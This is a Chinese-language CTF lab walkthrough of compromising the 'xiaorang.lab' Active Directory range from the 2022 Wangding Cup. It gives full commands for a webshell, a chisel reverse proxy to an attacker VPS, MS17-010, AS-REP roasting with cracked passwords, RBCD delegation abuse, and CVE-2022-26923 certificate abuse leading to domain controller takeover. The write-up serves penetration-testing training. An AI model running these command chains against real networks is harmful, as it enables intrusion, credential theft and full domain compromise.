前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >内网渗透—春秋云镜篇之2022网鼎杯

内网渗透—春秋云镜篇之2022网鼎杯

作者头像
亿人安全
发布2024-02-29 15:04:55
1730
发布2024-02-29 15:04:55
举报
文章被收录于专栏:红蓝对抗

原文由作者授权发表,首发在:先知社区

https://xz.aliyun.com/t/13633

外网打点

信息搜集

Fscan扫描

访问后发现是Wordpress站点,Wpscan扫描漏洞

探测相关插件和Wordpress版本均未发现相关漏洞,尝试弱口令,以弱口令成功登入后台

写入Webshell

后台可以编辑PHP文件,改动为一句话木马即可

使用蚁剑进行连接

在根目录下发现flag

内网横向

信息搜集

Fscan扫描内网网段

代码语言:javascript
复制
172.22.15.24:139 open
172.22.15.18:139 open
172.22.15.35:139 open
172.22.15.13:139 open
172.22.15.18:135 open
172.22.15.35:135 open
172.22.15.24:135 open
172.22.15.13:135 open
172.22.15.18:445 open
172.22.15.35:445 open
172.22.15.13:445 open
172.22.15.24:445 open
172.22.15.13:88 open
172.22.15.18:80 open
172.22.15.26:80 open
172.22.15.26:22 open
172.22.15.24:80 open
172.22.15.24:3306 open
[*] NetInfo 
[*]172.22.15.13
   [->]XR-DC01
   [->]172.22.15.13
[*] NetInfo 
[*]172.22.15.18
   [->]XR-CA
   [->]172.22.15.18
[*] NetInfo 
[*]172.22.15.24
   [->]XR-WIN08
   [->]172.22.15.24
[*] OsInfo 172.22.15.13 (Windows Server 2016 Standard 14393)
[+] MS17-010 172.22.15.24   (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios 172.22.15.35    XIAORANG\XR-0687              
[*] NetInfo 
[*]172.22.15.35
   [->]XR-0687
   [->]172.22.15.35
[*] NetBios 172.22.15.18    XR-CA.xiaorang.lab                  Windows Server 2016 Standard 14393
[*] NetBios 172.22.15.13    [+] DC:XR-DC01.xiaorang.lab          Windows Server 2016 Standard 14393
[*] NetBios 172.22.15.24    WORKGROUP\XR-WIN08                  Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] WebTitle http://172.22.15.26       code:200 len:39962  title:XIAORANG.LAB
[*] WebTitle http://172.22.15.18       code:200 len:703    title:IIS Windows Server
[*] WebTitle http://172.22.15.24       code:302 len:0      title:None 跳转url: http://172.22.15.24/www
[+] PocScan http://172.22.15.18 poc-yaml-active-directory-certsrv-detect 
[*] WebTitle http://172.22.15.24/www/sys/index.php code:200 len:135    title:None

代理搭建

代码语言:javascript
复制
VPS: ./chisel server -p 7000 --reverse
靶机:./chisel client VPS:7000 R:0.0.0.0:7001:socks

攻击域成员一(MS17-010)

访问存在Web服务的

发现是ZDOO,搜索相关漏洞后无果

弱口令登录

尝试弱口令登录,成功以admin/123456登入

发现多位域内用户,可能是要用到AS—REP Roasting攻击

Kindeditor漏洞尝试

在编辑信息处发现kindeditor编辑器

PHP类型

但尝试相关漏洞后无果,怀疑是内网常见漏洞,尝试我们常见的永恒之蓝漏洞。

Ms17-010攻击

使用upload指令传马,再用execute执行,进而上线至VIPER

发现flag

攻击域成员二(RBCD)

信息搜集

新建管理员用户

RDP登录后发现桌面存放有数据库服务

使用phpmyadmin进行数据库连接后将用户导出

AS—REP Roasting

使用GetNPUsers查找不需要Kerberos预身份验证的用户

代码语言:javascript
复制
proxychains python3 GetNPUsers.py -dc-ip 172.22.15.13 -usersfile /home/quan9i/zdoosys_user.txt xiaorang.lab/

hashcat爆破得到两组用户

代码语言:javascript
复制
lixiuying:winniethepooh
huachunmei:1qaz2wsx

使用cme尝试可RDP登录的主机

代码语言:javascript
复制
proxychains ./cme rdp 172.22.15.9/24 -u lixiuying -p winniethepooh -d xiaorang.lab

Bloodhound分析

代码语言:javascript
复制
proxychains bloodhound-python -u lixiuying -p winniethepooh -d xiaorang.lab -c all -ns 172.22.15.13 --zip --dns-tcp

查看域内关系

发现此用户对XR-0687主机有GenericWrite权限,可尝试RBCD获取管理员权限

RBCD攻击

代码语言:javascript
复制
proxychains python3 addcomputer.py xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -dc-host xiaorang.lab -computer-name 'qwq' -computer-pass 'Qq123456.'

proxychains python3 rbcd.py xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -action write -delegate-to 'XR-0687$' -delegate-from 'qwq$'

proxychains python3 getST.py xiaorang.lab/'qwq':'Qq123456.' -spn cifs/XR-0687.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13

而后导入票据并使用psexecc无密码登录即可进入

代码语言:javascript
复制
proxychains psexec.py administrator@XR-0687.xiaorang.lab -k -no-pass -dc-ip 172.22.15.13

攻击域控(CVE-2022–26923)

信息搜集

靶场提示AD-CS,使用certipy查找相关证书漏洞。

代码语言:javascript
复制
proxychains certipy find -u 'lixiuying@xiaorang.lab'  -password 'winniethepooh' -dc-ip 172.22.15.13 -vulnerable -stdout

不过我这里没出现具体漏洞,存在一些问题

做完想来应该是没有在etc/hosts中添加XR-CA.xiaorang.lab对应IP地址,导致无法找到它这个主机。

当时在这里卡住了,参考https://fushuling.com/index.php/2023/09/17/%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%c2%b7%e7%bd%91%e9%bc%8e%e6%9d%af%e5%8d%8a%e5%86%b3%e8%b5%9b%e6%b2%a1%e6%89%93%e5%ae%8c/

漏洞探测

首先添加用户,如果能够添加成功就说明漏洞存在,使用工具链接https://github.com/ly4k/Certipy

代码语言:javascript
复制
proxychains certipy account create -user 'TEST2$' -pass 'P@ssw0rd' -dns XR-DC01.xiaorang.lab -dc-ip 172.22.15.13 -u lixiuying -p 'winniethepooh'

成功添加,说明漏洞存在。

申请证书模板

要尝试两次才能成功

代码语言:javascript
复制
proxychains certipy req -u 'TEST2$@xiaorang.lab' -p 'P@ssw0rd' -ca 'xiaorang-XR-CA-CA' -target 172.22.15.18 -template 'Machine'

接下来按照正常流程走会出错

这里的话看大师傅们说是因为域控制器没有安装用于智能卡身份验证的证书,解决办法的话就是尝试 Schannel,通过 Schannel将证书传递到 LDAPS, 修改 LDAP 配置 (例如配置 RBCD / DCSync), 进而获得域控权限。

尝试Schannel

首先将pfx导出为.key 和.crt 两个文件(空密码)

代码语言:javascript
复制
openssl pkcs12 -in xr-dc01.pfx -nodes -out test.pem
openssl rsa -in test.pem -out test.key
openssl x509 -in test.pem -out test.crt
代码语言:javascript
复制
proxychains python3 passthecert.py -action whoami -crt test.crt -key test.key -domain xiaorang.lab -dc-ip 172.22.15.13

接下来将证书配置到域控的RBCD

代码语言:javascript
复制
proxychains python3 passthecert.py -action write_rbcd -crt test.crt -key test.key -domain xiaorang.lab -dc-ip 172.22.15.13 -delegate-to 'XR-DC01$' -delegate-from 'TEST2$'

接下来同之前一样,申请ST,导入票据,无密码登录即可。

代码语言:javascript
复制
proxychains getST.py xiaorang.lab/'TEST2$':'P@ssw0rd' -spn cifs/XR-DC01.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13
代码语言:javascript
复制
export KRB5CCNAME=Administrator@cifs_XR-DC01.xiaorang.lab@XIAORANG.LAB.ccache
proxychains python3 psexec.py Administrator@XR-DC01.xiaorang.lab -k -no-pass -dc-ip 172.22.15.13

在Administrator下发现flag

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2024-02-23,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 亿人安全 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 外网打点
    • 信息搜集
      • 写入Webshell
      • 内网横向
        • 信息搜集
          • 代理搭建
            • 攻击域成员一(MS17-010)
              • 弱口令登录
              • Kindeditor漏洞尝试
              • Ms17-010攻击
            • 攻击域成员二(RBCD)
              • 信息搜集
              • AS—REP Roasting
              • Bloodhound分析
              • RBCD攻击
            • 攻击域控(CVE-2022–26923)
              • 信息搜集
              • 漏洞探测
              • 申请证书模板
              • 尝试Schannel
          相关产品与服务
          多因子身份认证
          多因子身份认证(Multi-factor Authentication Service,MFAS)的目的是建立一个多层次的防御体系,通过结合两种或三种认证因子(基于记忆的/基于持有物的/基于生物特征的认证因子)验证访问者的身份,使系统或资源更加安全。攻击者即使破解单一因子(如口令、人脸),应用的安全依然可以得到保障。
          领券
          问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档